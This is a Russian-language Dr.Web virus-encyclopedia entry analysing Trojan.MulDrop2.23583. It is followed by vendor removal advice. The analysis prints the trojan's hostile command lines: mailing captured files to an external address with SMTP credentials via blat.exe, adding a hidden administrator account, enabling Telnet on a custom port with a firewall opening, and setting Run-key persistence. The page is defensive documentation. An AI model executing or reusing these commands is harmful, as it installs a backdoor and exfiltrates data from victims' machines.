Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.MulDrop2.23583

Добавлен в вирусную базу Dr.Web: 2011-05-25

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'snap.exe' = '<SYSTEM32>\snap.exe'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'astart.exe' = '<SYSTEM32>\astart.exe'
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
Изменяет следующие исполняемые системные файлы:
  • <SYSTEM32>\msvbvm60.dll
  • <SYSTEM32>\gdiplus.dll
Заражает следующие исполняемые файлы:
  • <SYSTEM32>\msvbvm60.dll
  • <SYSTEM32>\gdiplus.dll
Вредоносные функции:
Для затруднения выявления своего присутствия в системе
блокирует:
  • Cредство проверки системных файлов (SFC)
Создает и запускает на исполнение:
  • '<SYSTEM32>\Snapshotter.exe' -u "http://ch####p.dyndns.org" -o "%WINDIR%\IP_adress.jpg" -w 550 -h 440
  • '%TEMP%\1.tmp\Snapshotter.exe' -u "http://ch####p.dyndns.org" -o "<SYSTEM32>\IP_adress.jpg" -w 550 -h 440
  • '%TEMP%\1.tmp\blat.exe' -attach <SYSTEM32>\IP_adress.jpg -body "CRNJEUFU_IP_adress.jpg" -to ipnettt@yandex.ru
  • '<SYSTEM32>\blat.exe' -attach %WINDIR%\IP_adress.jpg -body "CRNJEUFU_IP_adress.jpg" -to ipnettt@yandex.ru
  • '<SYSTEM32>\blat.exe' -install -server smtp.yandex.ru -port 25 -f ipnettt@yandex.ru -u ipnettt -pw 1q2w3e
  • '%TEMP%\1.tmp\adduser.exe'
  • '<SYSTEM32>\astart.exe'
  • '%TEMP%\1.tmp\act.exe'
  • '<SYSTEM32>\snap.exe'
  • '%TEMP%\1.tmp\blat.exe' <SYSTEM32>\ip_first_start.txt -to ipnettt@yandex.ru
  • '%TEMP%\1.tmp\blat.exe' -install -server smtp.yandex.ru -port 25 -f ipnettt@yandex.ru -u ipnettt -pw 1q2w3e
Запускает на исполнение:
  • '<SYSTEM32>\sc.exe' start TlntSvr
  • '<SYSTEM32>\regsvr32.exe' /s "<SYSTEM32>\MSVBVM60.DLL"
  • '<SYSTEM32>\reg.exe' import key.reg
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\5.tmp\run.cmd" "
  • '<SYSTEM32>\sc.exe' config TlntSvr start= auto
  • '<SYSTEM32>\regsvr32.exe' /s "<SYSTEM32>\HtmlSnap2.dll"
  • '<SYSTEM32>\tlntadmn.exe' config port=971 sec=-NTLM
  • '<SYSTEM32>\net1.exe' localgroup "Администраторы" myuser /add
  • '<SYSTEM32>\net1.exe' start Telnet
  • '<SYSTEM32>\ping.exe' -n 11 127.0.0.1
  • '<SYSTEM32>\net1.exe' user myuser 1234 /add /expires:never /times:all
  • '<SYSTEM32>\tlntsvr.exe'
  • '<SYSTEM32>\regsvr32.exe' /s <SYSTEM32>\tlntsvrp.dll
  • '<SYSTEM32>\regsvr32.exe' /s "<SYSTEM32>\VB6STKIT.DLL"
  • '<SYSTEM32>\regsvr32.exe' /s "MSVBVM60.DLL"
  • '<SYSTEM32>\regsvr32.exe' /s "VB6STKIT.DLL"
  • '<SYSTEM32>\netsh.exe' firewall add portopening tcp 971 all
  • '<SYSTEM32>\regsvr32.exe' /s "HtmlSnap2.dll"
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\foto.bat" "
  • '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shimgvw.dll,ImageView_Fullscreen %TEMP%\1.tmp\fotka.jpg
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\win3.bat" "
  • '<SYSTEM32>\ping.exe' -n 180 127.0.0.1
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\4.tmp\test.bat" "
  • '<SYSTEM32>\ping.exe' -n 5 127.0.0.1
  • '<SYSTEM32>\ipconfig.exe' /all
  • '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "astart.exe" /t REG_SZ /d "<SYSTEM32>\astart.exe" /f
  • '<SYSTEM32>\reg.exe' add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "snap.exe" /t REG_SZ /d "<SYSTEM32>\snap.exe" /f
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\3.tmp\astart.bat" "
Изменения в файловой системе:
Создает следующие файлы:
  • <SYSTEM32>\Snapshotter.exe
  • <SYSTEM32>\HtmlSnap2.dll
  • <SYSTEM32>\VB6STKIT.DLL
  • <SYSTEM32>\astart.exe
  • <SYSTEM32>\blat.exe
  • <SYSTEM32>\snap.exe
  • %TEMP%\3.tmp\astart.bat
  • %TEMP%\5.tmp\key.reg
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\checkip.dyndns[1]
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\checkip.dyndns[1]
  • %TEMP%\4.tmp\test.bat
  • <SYSTEM32>\ip_first_start.txt
  • %TEMP%\5.tmp\run.cmd
  • %TEMP%\2.tmp\win3.bat
  • %TEMP%\1.tmp\snap.exe
  • %TEMP%\1.tmp\astart.exe
  • %TEMP%\1.tmp\foto.bat
  • %TEMP%\1.tmp\fotka.jpg
  • %TEMP%\1.tmp\act.exe
  • %TEMP%\1.tmp\adduser.exe
  • %TEMP%\1.tmp\VB6STKIT.DLL
  • %TEMP%\1.tmp\gdiplus.dll
  • %TEMP%\1.tmp\blat.exe
  • %TEMP%\1.tmp\HtmlSnap2.dll
  • %TEMP%\1.tmp\MSVBVM60.DLL
  • %TEMP%\1.tmp\Snapshotter.exe
Удаляет следующие файлы:
  • %TEMP%\1.tmp\Snapshotter.exe
  • %TEMP%\1.tmp\VB6STKIT.DLL
  • %TEMP%\1.tmp\HtmlSnap2.dll
  • %TEMP%\1.tmp\MSVBVM60.DLL
  • %TEMP%\2.tmp\win3.bat
  • %TEMP%\4.tmp\test.bat
  • %TEMP%\1.tmp\gdiplus.dll
  • %TEMP%\1.tmp\blat.exe
  • %TEMP%\1.tmp\adduser.exe
  • %TEMP%\1.tmp\foto.bat
  • %TEMP%\5.tmp\key.reg
  • %TEMP%\1.tmp\fotka.jpg
  • %TEMP%\1.tmp\act.exe
  • %TEMP%\1.tmp\snap.exe
  • %TEMP%\1.tmp\astart.exe
  • %TEMP%\5.tmp\run.cmd
  • %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\checkip.dyndns[1]
Сетевая активность:
Подключается к:
  • 'localhost':1043
  • 'ch####p.dyndns.org':80
  • '93.##8.134.11':25
  • 'localhost':1042
TCP:
Запросы HTTP GET:
  • ch####p.dyndns.org/
UDP:
  • DNS ASK ch####p.dyndns.org
  • DNS ASK sm##.yandex.ru
Другое:
Ищет следующие окна:
  • ClassName: 'MS_AutodialMonitor' WindowName: '(null)'
  • ClassName: 'MS_WebcheckMonitor' WindowName: '(null)'
  • ClassName: '#32770' WindowName: 'AtlBrowser'
  • ClassName: 'Internet Explorer_TridentDlgFrame' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке